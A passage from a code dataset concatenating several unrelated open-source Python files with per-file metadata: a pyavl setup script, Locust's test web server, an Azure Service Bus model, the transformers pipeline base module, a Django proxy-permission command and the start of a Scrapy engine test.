only bindings to the underlying implementation."""
_author = "Richard McGraw"
_authoremail = "dasnar at fastmail dot fm"
_maintainer = _author
_maintaineremail = _authoremail
link_args = []
if sys.platform != 'sunos5':
link_args.append("-Wl,-x") # -x flag not available on Solaris
# from Distutils doc:
# patch distutils if it can't cope with "classifiers" or
# "download_url" keywords
if sys.version < '2.2.3':
from distutils.dist import DistributionMetadata
DistributionMetadata.classifiers = None
DistributionMetadata.download_url = None
ext_avl = Extension(
"avl",
sources=["avl.c", "avlmodule.c"],
define_macros=[('HAVE_AVL_VERIFY', None), ('AVL_FOR_PYTHON', None)],
extra_compile_args=["-Wno-parentheses", "-Wno-uninitialized"],
extra_link_args=link_args
)
setup(
name="pyavl",
version=__VERSION__,
description="avl-tree type for Python (C-written extension module)",
url="http://dasnar.sdf-eu.org/miscres.html",
download_url="http://sourceforge.net/projects/pyavl/",
author=_author,
author_email=_authoremail,
maintainer=_maintainer,
license="None, public domain",
ext_modules=[ext_avl],
classifiers=[
'Intended Audience :: Developers',
'License :: Public Domain',
'Programming Language :: C',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules'
],
long_description=laius
)
| gpl-3.0 | -1,963,531,965,556,900,400 | 32.0625 | 73 | 0.68242 | false |
locustio/locust | locust/test/testcases.py | 1 | 5818 | import base64
import logging
import random
import sys
import unittest
import warnings
from io import BytesIO
import gevent
import gevent.pywsgi
from flask import Flask, Response, make_response, redirect, request, send_file, stream_with_context
import locust
from locust import log
from locust.event import Events
from locust.env import Environment
from locust.test.mock_logging import MockedLoggingHandler
from locust.test.util import clear_all_functools_lru_cache
app = Flask(__name__)
app.jinja_env.add_extension("jinja2.ext.do")
@app.route("/ultra_fast")
def ultra_fast():
return "This is an ultra fast response"
@app.route("/fast")
def fast():
gevent.sleep(random.choice([0.1, 0.2, 0.3]))
return "This is a fast response"
@app.route("/slow")
def slow():
delay = request.args.get("delay")
if delay:
gevent.sleep(float(delay))
else:
gevent.sleep(random.choice([0.5, 1, 1.5]))
return "This is a slow response"
@app.route("/consistent")
def consistent():
gevent.sleep(0.2)
return "This is a consistent response"
@app.route("/request_method", methods=["POST", "GET", "HEAD", "PUT", "DELETE", "PATCH"])
def request_method():
return request.method
@app.route("/request_header_test")
def request_header_test():
return request.headers["X-Header-Test"]
@app.route("/post", methods=["POST"])
@app.route("/put", methods=["PUT"])
def manipulate():
return str(request.form.get("arg", ""))
@app.route("/get_arg", methods=["GET"])
def get_arg():
return request.args.get("arg")
@app.route("/fail")
def failed_request():
return "This response failed", 500
@app.route("/status/204")
def status_204():
return "", 204
@app.route("/redirect", methods=["GET", "POST"])
def do_redirect():
delay = request.args.get("delay")
if delay:
gevent.sleep(float(delay))
url = request.args.get("url", "/ultra_fast")
return redirect(url)
@app.route("/basic_auth")
def basic_auth():
auth = base64.b64decode(request.headers.get("Authorization", "").replace("Basic ", "")).decode("utf-8")
if auth == "locust:menace":
return "Authorized"
resp = make_response("401 Authorization Required", 401)
resp.headers["WWW-Authenticate"] = 'Basic realm="Locust"'
return resp
@app.route("/no_content_length")
def no_content_length():
r = send_file(
BytesIO("This response does not have content-length in the header".encode("utf-8")),
etag=False,
mimetype="text/plain",
)
r.headers.remove("Content-Length")
return r
@app.errorhandler(404)
def not_found(error):
return "Not Found", 404
@app.route("/streaming/<int:iterations>")
def streaming_response(iterations):
import time
def generate():
yield "<html><body><h1>streaming response</h1>"
for i in range(iterations):
yield "<span>%s</span>\n" % i
time.sleep(0.01)
yield "</body></html>"
return Response(stream_with_context(generate()), mimetype="text/html")
@app.route("/set_cookie", methods=["POST"])
def set_cookie():
response = make_response("ok")
response.set_cookie(request.args.get("name"), request.args.get("value"))
return response
@app.route("/get_cookie")
def get_cookie():
return make_response(request.cookies.get(request.args.get("name"), ""))
class LocustTestCase(unittest.TestCase):
"""
Test case class that restores locust.events.EventHook listeners on tearDown, so that it is
safe to register any custom event handlers within the test.
"""
def setUp(self):
# Prevent args passed to test runner from being passed to Locust
del sys.argv[1:]
locust.events = Events()
self.environment = Environment(events=locust.events, catch_exceptions=False)
self.runner = self.environment.create_local_runner()
# When running the tests in Python 3 we get warnings about unclosed sockets.
# This causes tests that depends on calls to sys.stderr to fail, so we'll
# suppress those warnings. For more info see:
# https://github.com/requests/requests/issues/1882
try:
warnings.filterwarnings(action="ignore", message="unclosed <socket object", category=ResourceWarning)
except NameError:
# ResourceWarning doesn't exist in Python 2, but since the warning only appears
# on Python 3 we don't need to mock it. Instead we can happily ignore the exception
pass
# set up mocked logging handler
self._logger_class = MockedLoggingHandler()
self._logger_class.setLevel(logging.INFO)
self._root_log_handlers = [h for h in logging.root.handlers]
[logging.root.removeHandler(h) for h in logging.root.handlers]
logging.root.addHandler(self._logger_class)
logging.root.setLevel(logging.INFO)
self.mocked_log = MockedLoggingHandler
# set unhandled exception flag to False
log.unhandled_greenlet_exception = False
def tearDown(self):
# restore logging class
logging.root.removeHandler(self._logger_class)
[logging.root.addHandler(h) for h in self._root_log_handlers]
self.mocked_log.reset()
clear_all_functools_lru_cache()
class WebserverTestCase(LocustTestCase):
"""
Test case class that sets up an HTTP server which can be used within the tests
"""
def setUp(self):
super().setUp()
self._web_server = gevent.pywsgi.WSGIServer(("127.0.0.1", 0), app, log=None)
gevent.spawn(lambda: self._web_server.serve_forever())
gevent.sleep(0.01)
self.port = self._web_server.server_port
def tearDown(self):
super().tearDown()
self._web_server.stop_accepting()
self._web_server.stop()
| mit | 1,859,846,979,491,025,200 | 27.519608 | 113 | 0.660021 | false |
lmazuel/azure-sdk-for-python | azure-mgmt-servicebus/azure/mgmt/servicebus/models/check_name_availability.py | 1 | 1132 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class CheckNameAvailability(Model):
"""Description of a Check Name availability request properties.
:param name: The Name to check the namespce name availability and The
namespace name can contain only letters, numbers, and hyphens. The
namespace must start with a letter, and it must end with a letter or
number.
:type name: str
"""
_validation = {
'name': {'required': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
}
def __init__(self, name):
super(CheckNameAvailability, self).__init__()
self.name = name
| mit | 7,672,745,851,029,361,000 | 31.342857 | 76 | 0.583922 | false |
huggingface/transformers | src/transformers/pipelines/base.py | 1 | 30282 | # coding=utf-8
# Copyright 2018 The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import csv
import importlib
import json
import os
import pickle
import sys
import warnings
from abc import ABC, abstractmethod
from contextlib import contextmanager
from os.path import abspath, exists
from typing import TYPE_CHECKING, Any, Dict, List, Optional, Tuple, Union
from ..feature_extraction_utils import PreTrainedFeatureExtractor
from ..file_utils import add_end_docstrings, is_tf_available, is_torch_available
from ..modelcard import ModelCard
from ..models.auto.configuration_auto import AutoConfig
from ..tokenization_utils import PreTrainedTokenizer, TruncationStrategy
from ..utils import logging
if is_tf_available():
import tensorflow as tf
from ..models.auto.modeling_tf_auto import TFAutoModel
if is_torch_available():
import torch
from ..models.auto.modeling_auto import AutoModel
if TYPE_CHECKING:
from ..modeling_tf_utils import TFPreTrainedModel
from ..modeling_utils import PreTrainedModel
logger = logging.get_logger(__name__)
def infer_framework_load_model(
model,
config: AutoConfig,
model_classes: Optional[Dict[str, Tuple[type]]] = None,
task: Optional[str] = None,
framework: Optional[str] = None,
**model_kwargs
):
"""
Select framework (TensorFlow or PyTorch) to use from the :obj:`model` passed. Returns a tuple (framework, model).
If :obj:`model` is instantiated, this function will just infer the framework from the model class. Otherwise
:obj:`model` is actually a checkpoint name and this method will try to instantiate it using :obj:`model_classes`.
Since we don't want to instantiate the model twice, this model is returned for use by the pipeline.
If both frameworks are installed and available for :obj:`model`, PyTorch is selected.
Args:
model (:obj:`str`, :class:`~transformers.PreTrainedModel` or :class:`~transformers.TFPreTrainedModel`):
The model to infer the framework from. If :obj:`str`, a checkpoint name. The model to infer the framewrok
from.
config (:class:`~transformers.AutoConfig`):
The config associated with the model to help using the correct class
model_classes (dictionary :obj:`str` to :obj:`type`, `optional`):
A mapping framework to class.
task (:obj:`str`):
The task defining which pipeline will be returned.
model_kwargs:
Additional dictionary of keyword arguments passed along to the model's :obj:`from_pretrained(...,
**model_kwargs)` function.
Returns:
:obj:`Tuple`: A tuple framework, model.
"""
if not is_tf_available() and not is_torch_available():
raise RuntimeError(
"At least one of TensorFlow 2.0 or PyTorch should be installed. "
"To install TensorFlow 2.0, read the instructions at https://www.tensorflow.org/install/ "
"To install PyTorch, read the instructions at https://pytorch.org/."
)
if isinstance(model, str):
model_kwargs["_from_pipeline"] = task
class_tuple = ()
look_pt = is_torch_available() and framework in {"pt", None}
look_tf = is_tf_available() and framework in {"tf", None}
if model_classes:
if look_pt:
class_tuple = class_tuple + model_classes.get("pt", (AutoModel,))
if look_tf:
class_tuple = class_tuple + model_classes.get("tf", (TFAutoModel,))
if config.architectures:
classes = []
for architecture in config.architectures:
transformers_module = importlib.import_module("transformers")
if look_pt:
_class = getattr(transformers_module, architecture, None)
if _class is not None:
classes.append(_class)
if look_tf:
_class = getattr(transformers_module, f"TF{architecture}", None)
if _class is not None:
classes.append(_class)
class_tuple = class_tuple + tuple(classes)
if len(class_tuple) == 0:
raise ValueError(f"Pipeline cannot infer suitable model classes from {model}")
for model_class in class_tuple:
kwargs = model_kwargs.copy()
if framework == "pt" and model.endswith(".h5"):
kwargs["from_tf"] = True
logger.warning(
"Model might be a TensorFlow model (ending with `.h5`) but TensorFlow is not available. "
"Trying to load the model with PyTorch."
)
elif framework == "tf" and model.endswith(".bin"):
kwargs["from_pt"] = True
logger.warning(
"Model might be a PyTorch model (ending with `.bin`) but PyTorch is not available. "
"Trying to load the model with Tensorflow."
)
try:
model = model_class.from_pretrained(model, **kwargs)
# Stop loading on the first successful load.
break
except (OSError, ValueError):
continue
if isinstance(model, str):
raise ValueError(f"Could not load model {model} with any of the following classes: {class_tuple}.")
framework = "tf" if model.__class__.__name__.startswith("TF") else "pt"
return framework, model
def infer_framework_from_model(
model,
model_classes: Optional[Dict[str, Tuple[type]]] = None,
task: Optional[str] = None,
framework: Optional[str] = None,
**model_kwargs
):
"""
Select framework (TensorFlow or PyTorch) to use from the :obj:`model` passed. Returns a tuple (framework, model).
If :obj:`model` is instantiated, this function will just infer the framework from the model class. Otherwise
:obj:`model` is actually a checkpoint name and this method will try to instantiate it using :obj:`model_classes`.
Since we don't want to instantiate the model twice, this model is returned for use by the pipeline.
If both frameworks are installed and available for :obj:`model`, PyTorch is selected.
Args:
model (:obj:`str`, :class:`~transformers.PreTrainedModel` or :class:`~transformers.TFPreTrainedModel`):
The model to infer the framework from. If :obj:`str`, a checkpoint name. The model to infer the framewrok
from.
model_classes (dictionary :obj:`str` to :obj:`type`, `optional`):
A mapping framework to class.
task (:obj:`str`):
The task defining which pipeline will be returned.
model_kwargs:
Additional dictionary of keyword arguments passed along to the model's :obj:`from_pretrained(...,
**model_kwargs)` function.
Returns:
:obj:`Tuple`: A tuple framework, model.
"""
if isinstance(model, str):
config = AutoConfig.from_pretrained(model, _from_pipeline=task, **model_kwargs)
else:
config = model.config
return infer_framework_load_model(
model, config, model_classes=model_classes, _from_pipeline=task, task=task, framework=framework, **model_kwargs
)
def get_framework(model, revision: Optional[str] = None):
"""
Select framework (TensorFlow or PyTorch) to use.
Args:
model (:obj:`str`, :class:`~transformers.PreTrainedModel` or :class:`~transformers.TFPreTrainedModel`):
If both frameworks are installed, picks the one corresponding to the model passed (either a model class or
the model name). If no specific model is provided, defaults to using PyTorch.
"""
warnings.warn(
"`get_framework` is deprecated and will be removed in v5, use `infer_framework_from_model` instead.",
FutureWarning,
)
if not is_tf_available() and not is_torch_available():
raise RuntimeError(
"At least one of TensorFlow 2.0 or PyTorch should be installed. "
"To install TensorFlow 2.0, read the instructions at https://www.tensorflow.org/install/ "
"To install PyTorch, read the instructions at https://pytorch.org/."
)
if isinstance(model, str):
if is_torch_available() and not is_tf_available():
model = AutoModel.from_pretrained(model, revision=revision)
elif is_tf_available() and not is_torch_available():
model = TFAutoModel.from_pretrained(model, revision=revision)
else:
try:
model = AutoModel.from_pretrained(model, revision=revision)
except OSError:
model = TFAutoModel.from_pretrained(model, revision=revision)
framework = "tf" if model.__class__.__name__.startswith("TF") else "pt"
return framework
def get_default_model(targeted_task: Dict, framework: Optional[str], task_options: Optional[Any]) -> str:
"""
Select a default model to use for a given task. Defaults to pytorch if ambiguous.
Args:
targeted_task (:obj:`Dict` ):
Dictionary representing the given task, that should contain default models
framework (:obj:`str`, None)
"pt", "tf" or None, representing a specific framework if it was specified, or None if we don't know yet.
task_options (:obj:`Any`, None)
Any further value required by the task to get fully specified, for instance (SRC, TGT) languages for
translation task.
Returns
:obj:`str` The model string representing the default model for this pipeline
"""
if is_torch_available() and not is_tf_available():
framework = "pt"
elif is_tf_available() and not is_torch_available():
framework = "tf"
defaults = targeted_task["default"]
if task_options:
if task_options not in defaults:
raise ValueError(f"The task does not provide any default models for options {task_options}")
default_models = defaults[task_options]["model"]
elif "model" in defaults:
default_models = targeted_task["default"]["model"]
else:
# XXX This error message needs to be updated to be more generic if more tasks are going to become
# parametrized
raise ValueError('The task defaults can\'t be correctly selected. You probably meant "translation_XX_to_YY"')
if framework is None:
framework = "pt"
return default_models[framework]
class PipelineException(Exception):
"""
Raised by a :class:`~transformers.Pipeline` when handling __call__.
Args:
task (:obj:`str`): The task of the pipeline.
model (:obj:`str`): The model used by the pipeline.
reason (:obj:`str`): The error message to display.
"""
def __init__(self, task: str, model: str, reason: str):
super().__init__(reason)
self.task = task
self.model = model
class ArgumentHandler(ABC):
"""
Base interface for handling arguments for each :class:`~transformers.pipelines.Pipeline`.
"""
@abstractmethod
def __call__(self, *args, **kwargs):
raise NotImplementedError()
class PipelineDataFormat:
"""
Base class for all the pipeline supported data format both for reading and writing. Supported data formats
currently includes:
- JSON
- CSV
- stdin/stdout (pipe)
:obj:`PipelineDataFormat` also includes some utilities to work with multi-columns like mapping from datasets
columns to pipelines keyword arguments through the :obj:`dataset_kwarg_1=dataset_column_1` format.
Args:
output_path (:obj:`str`, `optional`): Where to save the outgoing data.
input_path (:obj:`str`, `optional`): Where to look for the input data.
column (:obj:`str`, `optional`): The column to read.
overwrite (:obj:`bool`, `optional`, defaults to :obj:`False`):
Whether or not to overwrite the :obj:`output_path`.
"""
SUPPORTED_FORMATS = ["json", "csv", "pipe"]
def __init__(
self,
output_path: Optional[str],
input_path: Optional[str],
column: Optional[str],
overwrite: bool = False,
):
self.output_path = output_path
self.input_path = input_path
self.column = column.split(",") if column is not None else [""]
self.is_multi_columns = len(self.column) > 1
if self.is_multi_columns:
self.column = [tuple(c.split("=")) if "=" in c else (c, c) for c in self.column]
if output_path is not None and not overwrite:
if exists(abspath(self.output_path)):
raise OSError(f"{self.output_path} already exists on disk")
if input_path is not None:
if not exists(abspath(self.input_path)):
raise OSError(f"{self.input_path} doesnt exist on disk")
@abstractmethod
def __iter__(self):
raise NotImplementedError()
@abstractmethod
def save(self, data: Union[dict, List[dict]]):
"""
Save the provided data object with the representation for the current
:class:`~transformers.pipelines.PipelineDataFormat`.
Args:
data (:obj:`dict` or list of :obj:`dict`): The data to store.
"""
raise NotImplementedError()
def save_binary(self, data: Union[dict, List[dict]]) -> str:
"""
Save the provided data object as a pickle-formatted binary data on the disk.
Args:
data (:obj:`dict` or list of :obj:`dict`): The data to store.
Returns:
:obj:`str`: Path where the data has been saved.
"""
path, _ = os.path.splitext(self.output_path)
binary_path = os.path.extsep.join((path, "pickle"))
with open(binary_path, "wb+") as f_output:
pickle.dump(data, f_output)
return binary_path
@staticmethod
def from_str(
format: str,
output_path: Optional[str],
input_path: Optional[str],
column: Optional[str],
overwrite=False,
) -> "PipelineDataFormat":
"""
Creates an instance of the right subclass of :class:`~transformers.pipelines.PipelineDataFormat` depending on
:obj:`format`.
Args:
format: (:obj:`str`):
The format of the desired pipeline. Acceptable values are :obj:`"json"`, :obj:`"csv"` or :obj:`"pipe"`.
output_path (:obj:`str`, `optional`):
Where to save the outgoing data.
input_path (:obj:`str`, `optional`):
Where to look for the input data.
column (:obj:`str`, `optional`):
The column to read.
overwrite (:obj:`bool`, `optional`, defaults to :obj:`False`):
Whether or not to overwrite the :obj:`output_path`.
Returns:
:class:`~transformers.pipelines.PipelineDataFormat`: The proper data format.
"""
if format == "json":
return JsonPipelineDataFormat(output_path, input_path, column, overwrite=overwrite)
elif format == "csv":
return CsvPipelineDataFormat(output_path, input_path, column, overwrite=overwrite)
elif format == "pipe":
return PipedPipelineDataFormat(output_path, input_path, column, overwrite=overwrite)
else:
raise KeyError(f"Unknown reader {format} (Available reader are json/csv/pipe)")
class CsvPipelineDataFormat(PipelineDataFormat):
"""
Support for pipelines using CSV data format.
Args:
output_path (:obj:`str`, `optional`): Where to save the outgoing data.
input_path (:obj:`str`, `optional`): Where to look for the input data.
column (:obj:`str`, `optional`): The column to read.
overwrite (:obj:`bool`, `optional`, defaults to :obj:`False`):
Whether or not to overwrite the :obj:`output_path`.
"""
def __init__(
self,
output_path: Optional[str],
input_path: Optional[str],
column: Optional[str],
overwrite=False,
):
super().__init__(output_path, input_path, column, overwrite=overwrite)
def __iter__(self):
with open(self.input_path, "r") as f:
reader = csv.DictReader(f)
for row in reader:
if self.is_multi_columns:
yield {k: row[c] for k, c in self.column}
else:
yield row[self.column[0]]
def save(self, data: List[dict]):
"""
Save the provided data object with the representation for the current
:class:`~transformers.pipelines.PipelineDataFormat`.
Args:
data (:obj:`List[dict]`): The data to store.
"""
with open(self.output_path, "w") as f:
if len(data) > 0:
writer = csv.DictWriter(f, list(data[0].keys()))
writer.writeheader()
writer.writerows(data)
class JsonPipelineDataFormat(PipelineDataFormat):
"""
Support for pipelines using JSON file format.
Args:
output_path (:obj:`str`, `optional`): Where to save the outgoing data.
input_path (:obj:`str`, `optional`): Where to look for the input data.
column (:obj:`str`, `optional`): The column to read.
overwrite (:obj:`bool`, `optional`, defaults to :obj:`False`):
Whether or not to overwrite the :obj:`output_path`.
"""
def __init__(
self,
output_path: Optional[str],
input_path: Optional[str],
column: Optional[str],
overwrite=False,
):
super().__init__(output_path, input_path, column, overwrite=overwrite)
with open(input_path, "r") as f:
self._entries = json.load(f)
def __iter__(self):
for entry in self._entries:
if self.is_multi_columns:
yield {k: entry[c] for k, c in self.column}
else:
yield entry[self.column[0]]
def save(self, data: dict):
"""
Save the provided data object in a json file.
Args:
data (:obj:`dict`): The data to store.
"""
with open(self.output_path, "w") as f:
json.dump(data, f)
class PipedPipelineDataFormat(PipelineDataFormat):
"""
Read data from piped input to the python process. For multi columns data, columns should separated by \t
If columns are provided, then the output will be a dictionary with {column_x: value_x}
Args:
output_path (:obj:`str`, `optional`): Where to save the outgoing data.
input_path (:obj:`str`, `optional`): Where to look for the input data.
column (:obj:`str`, `optional`): The column to read.
overwrite (:obj:`bool`, `optional`, defaults to :obj:`False`):
Whether or not to overwrite the :obj:`output_path`.
"""
def __iter__(self):
for line in sys.stdin:
# Split for multi-columns
if "\t" in line:
line = line.split("\t")
if self.column:
# Dictionary to map arguments
yield {kwargs: l for (kwargs, _), l in zip(self.column, line)}
else:
yield tuple(line)
# No dictionary to map arguments
else:
yield line
def save(self, data: dict):
"""
Print the data.
Args:
data (:obj:`dict`): The data to store.
"""
print(data)
def save_binary(self, data: Union[dict, List[dict]]) -> str:
if self.output_path is None:
raise KeyError(
"When using piped input on pipeline outputting large object requires an output file path. "
"Please provide such output path through --output argument."
)
return super().save_binary(data)
class _ScikitCompat(ABC):
"""
Interface layer for the Scikit and Keras compatibility.
"""
@abstractmethod
def transform(self, X):
raise NotImplementedError()
@abstractmethod
def predict(self, X):
raise NotImplementedError()
PIPELINE_INIT_ARGS = r"""
Arguments:
model (:obj:`~transformers.PreTrainedModel` or :obj:`~transformers.TFPreTrainedModel`):
The model that will be used by the pipeline to make predictions. This needs to be a model inheriting from
:class:`~transformers.PreTrainedModel` for PyTorch and :class:`~transformers.TFPreTrainedModel` for
TensorFlow.
tokenizer (:obj:`~transformers.PreTrainedTokenizer`):
The tokenizer that will be used by the pipeline to encode data for the model. This object inherits from
:class:`~transformers.PreTrainedTokenizer`.
modelcard (:obj:`str` or :class:`~transformers.ModelCard`, `optional`):
Model card attributed to the model for this pipeline.
framework (:obj:`str`, `optional`):
The framework to use, either :obj:`"pt"` for PyTorch or :obj:`"tf"` for TensorFlow. The specified framework
must be installed.
If no framework is specified, will default to the one currently installed. If no framework is specified and
both frameworks are installed, will default to the framework of the :obj:`model`, or to PyTorch if no model
is provided.
task (:obj:`str`, defaults to :obj:`""`):
A task-identifier for the pipeline.
args_parser (:class:`~transformers.pipelines.ArgumentHandler`, `optional`):
Reference to the object in charge of parsing supplied pipeline parameters.
device (:obj:`int`, `optional`, defaults to -1):
Device ordinal for CPU/GPU supports. Setting this to -1 will leverage CPU, a positive will run the model on
the associated CUDA device id.
binary_output (:obj:`bool`, `optional`, defaults to :obj:`False`):
Flag indicating if the output the pipeline should happen in a binary format (i.e., pickle) or as raw text.
"""
@add_end_docstrings(PIPELINE_INIT_ARGS)
class Pipeline(_ScikitCompat):
"""
The Pipeline class is the class from which all pipelines inherit. Refer to this class for methods shared across
different pipelines.
Base class implementing pipelined operations. Pipeline workflow is defined as a sequence of the following
operations:
Input -> Tokenization -> Model Inference -> Post-Processing (task dependent) -> Output
Pipeline supports running on CPU or GPU through the device argument (see below).
Some pipeline, like for instance :class:`~transformers.FeatureExtractionPipeline` (:obj:`'feature-extraction'` )
output large tensor object as nested-lists. In order to avoid dumping such large structure as textual data we
provide the :obj:`binary_output` constructor argument. If set to :obj:`True`, the output will be stored in the
pickle format.
"""
default_input_names = None
def __init__(
self,
model: Union["PreTrainedModel", "TFPreTrainedModel"],
tokenizer: Optional[PreTrainedTokenizer] = None,
feature_extractor: Optional[PreTrainedFeatureExtractor] = None,
modelcard: Optional[ModelCard] = None,
framework: Optional[str] = None,
task: str = "",
args_parser: ArgumentHandler = None,
device: int = -1,
binary_output: bool = False,
):
if framework is None:
framework, model = infer_framework_load_model(model, config=model.config)
self.task = task
self.model = model
self.tokenizer = tokenizer
self.feature_extractor = feature_extractor
self.modelcard = modelcard
self.framework = framework
self.device = device if framework == "tf" else torch.device("cpu" if device < 0 else f"cuda:{device}")
self.binary_output = binary_output
# Special handling
if self.framework == "pt" and self.device.type == "cuda":
self.model = self.model.to(self.device)
# Update config with task specific parameters
task_specific_params = self.model.config.task_specific_params
if task_specific_params is not None and task in task_specific_params:
self.model.config.update(task_specific_params.get(task))
def save_pretrained(self, save_directory: str):
"""
Save the pipeline's model and tokenizer.
Args:
save_directory (:obj:`str`):
A path to the directory where to saved. It will be created if it doesn't exist.
"""
if os.path.isfile(save_directory):
logger.error(f"Provided path ({save_directory}) should be a directory, not a file")
return
os.makedirs(save_directory, exist_ok=True)
self.model.save_pretrained(save_directory)
if self.tokenizer is not None:
self.tokenizer.save_pretrained(save_directory)
if self.feature_extractor is not None:
self.feature_extractor.save_pretrained(save_directory)
if self.modelcard is not None:
self.modelcard.save_pretrained(save_directory)
def transform(self, X):
"""
Scikit / Keras interface to transformers' pipelines. This method will forward to __call__().
"""
return self(X=X)
def predict(self, X):
"""
Scikit / Keras interface to transformers' pipelines. This method will forward to __call__().
"""
return self(X=X)
@contextmanager
def device_placement(self):
"""
Context Manager allowing tensor allocation on the user-specified device in framework agnostic way.
Returns:
Context manager
Examples::
# Explicitly ask for tensor allocation on CUDA device :0
pipe = pipeline(..., device=0)
with pipe.device_placement():
# Every framework specific tensor allocation will be done on the request device
output = pipe(...)
"""
if self.framework == "tf":
with tf.device("/CPU:0" if self.device == -1 else f"/device:GPU:{self.device}"):
yield
else:
if self.device.type == "cuda":
torch.cuda.set_device(self.device)
yield
def ensure_tensor_on_device(self, **inputs):
"""
Ensure PyTorch tensors are on the specified device.
Args:
inputs (keyword arguments that should be :obj:`torch.Tensor`): The tensors to place on :obj:`self.device`.
Return:
:obj:`Dict[str, torch.Tensor]`: The same as :obj:`inputs` but on the proper device.
"""
return {
name: tensor.to(self.device) if isinstance(tensor, torch.Tensor) else tensor
for name, tensor in inputs.items()
}
def check_model_type(self, supported_models: Union[List[str], dict]):
"""
Check if the model class is in supported by the pipeline.
Args:
supported_models (:obj:`List[str]` or :obj:`dict`):
The list of models supported by the pipeline, or a dictionary with model class values.
"""
if not isinstance(supported_models, list): # Create from a model mapping
supported_models_names = []
for config, model in supported_models.items():
# Mapping can now contain tuples of models for the same configuration.
if isinstance(model, tuple):
supported_models_names.extend([_model.__name__ for _model in model])
else:
supported_models_names.append(model.__name__)
supported_models = supported_models_names
if self.model.__class__.__name__ not in supported_models:
raise PipelineException(
self.task,
self.model.base_model_prefix,
f"The model '{self.model.__class__.__name__}' is not supported for {self.task}. Supported models are {supported_models}",
)
def _parse_and_tokenize(
self, inputs, padding=True, add_special_tokens=True, truncation=TruncationStrategy.DO_NOT_TRUNCATE, **kwargs
):
"""
Parse arguments and tokenize
"""
# Parse arguments
inputs = self.tokenizer(
inputs,
add_special_tokens=add_special_tokens,
return_tensors=self.framework,
padding=padding,
truncation=truncation,
)
return inputs
def __call__(self, *args, **kwargs):
inputs = self._parse_and_tokenize(*args, **kwargs)
return self._forward(inputs)
def _forward(self, inputs, return_tensors=False):
"""
Internal framework specific forward dispatching
Args:
inputs: dict holding all the keyword arguments for required by the model forward method.
return_tensors: Whether to return native framework (pt/tf) tensors rather than numpy array
Returns:
Numpy array
"""
# Encode for forward
with self.device_placement():
if self.framework == "tf":
# TODO trace model
predictions = self.model(inputs.data, training=False)[0]
else:
with torch.no_grad():
inputs = self.ensure_tensor_on_device(**inputs)
predictions = self.model(**inputs)[0].cpu()
if return_tensors:
return predictions
else:
return predictions.numpy()
| apache-2.0 | 8,440,981,556,735,697,000 | 37.477764 | 137 | 0.613665 | false |
sha-red/django-shared-utils | shared/utils/management/commands/fix_proxymodel_permissions.py | 1 | 1509 | # -*- coding: utf-8 -*-
"""Add permissions for proxy model.
This is needed because of the bug https://code.djangoproject.com/ticket/11154
in Django (as of 1.6, it's not fixed).
When a permission is created for a proxy model, it actually creates if for it's
base model app_label (eg: for "article" instead of "about", for the About proxy
model).
What we need, however, is that the permission be created for the proxy model
itself, in order to have the proper entries displayed in the admin.
Source: https://gist.github.com/magopian/7543724
"""
import sys
from django.apps import apps
from django.contrib.auth.management import _get_all_permissions
from django.contrib.auth.models import Permission
from django.contrib.contenttypes.models import ContentType
from django.core.management.base import BaseCommand
class Command(BaseCommand):
help = "Fix permissions for proxy models."
def handle(self, *args, **options):
for model in apps.get_models():
opts = model._meta
ctype, created = ContentType.objects.get_or_create(
app_label=opts.app_label,
model=opts.object_name.lower())
for codename, name in _get_all_permissions(opts):
p, created = Permission.objects.get_or_create(
codename=codename,
content_type=ctype,
defaults={'name': name})
if created:
sys.stdout.write('Adding permission {}\n'.format(p))
| mit | 2,577,458,159,359,952,400 | 34.093023 | 79 | 0.664016 | false |
wujuguang/scrapy | tests/test_engine.py | 1 | 11123 | """
Scrapy engine tests
This starts a testing web server (using twisted.server.Site) and then crawls it
with the Scrapy crawler.
To view the testing web server in a browser you can start it by running this
module with the ``runserver`` argument::
python test_engine.py runserver
"""
from __future__ import print_function
import sys, os, re
from six.moves.urllib.parse import urlparse
from twisted.internet import reactor, defer
from twisted.web import server, static, util
from twisted.trial import unittest
from scrapy import signals
from scrapy.core.engine import ExecutionEngine
from scrapy.utils.test import get_crawler
from pydispatch import dispatcher
from tests import tests_datadir
from scrapy.spiders import Spider
from scrapy.item import Item, Field
from scrapy.linkextractors import LinkExtractor
from scrapy.http import Request
from scrapy.utils.signal import disconnect_all
class TestItem(Item):
name = Field()
url = Field()
price = Field()
class TestSpider(Spider):
name = "scrapytest.org"
allowed_domains = ["scrapytest.org", "localhost"]
itemurl_re = re.compile(r"item\d+.html")
name_re = re.compile(r"<h1>(.*?)</h1>", re.M)
price_re = re.compile(r">Price: \$(.*?)<", re.M)
item_cls = TestItem
def parse(self, response):
xlink = LinkExtractor()
itemre = re.compile(self.itemurl_re)
for link in xlink.extract_links(response):
if itemre.search(link.url):
yield Request(url=link.url, callback=self.parse_item)
def parse_item(self, response):
item = self.item_cls()
m = self.name_re.search(response.text)
if m:
item['name'] = m.group(1)
item['url'] = response.url
m = self.price_re.search(response.text)
if m:
item['price'] = m.group(1)
return item
class TestDupeFilterSpider(TestSpider):
def start_requests(self):
return (Request(url) for url in self.start_urls) # no dont_filter=True
class DictItemsSpider(TestSpider):
item_cls = dict
class ItemZeroDivisionErrorSpider(TestSpider):
custom_settings = {
"ITEM_PIPELINES": {
"tests.pipelines.ProcessWithZeroDivisionErrorPipiline": 300,
}
}
def start_test_site(debug=False):
root_dir = os.path.join(tests_datadir, "test_site")
r = static.File(root_dir)
r.putChild(b"redirect", util.Redirect(b"/redirected"))
r.putChild(b"redirected", static.Data(b"Redirected here", "text/plain"))
port = reactor.listenTCP(0, server.Site(r), interface="127.0.0.1")
if debug:
print("Test server running at http://localhost:%d/ - hit Ctrl-C to finish." \
% port.getHost().port)
return port
class CrawlerRun(object):
"""A class to run the crawler and keep track of events occurred"""
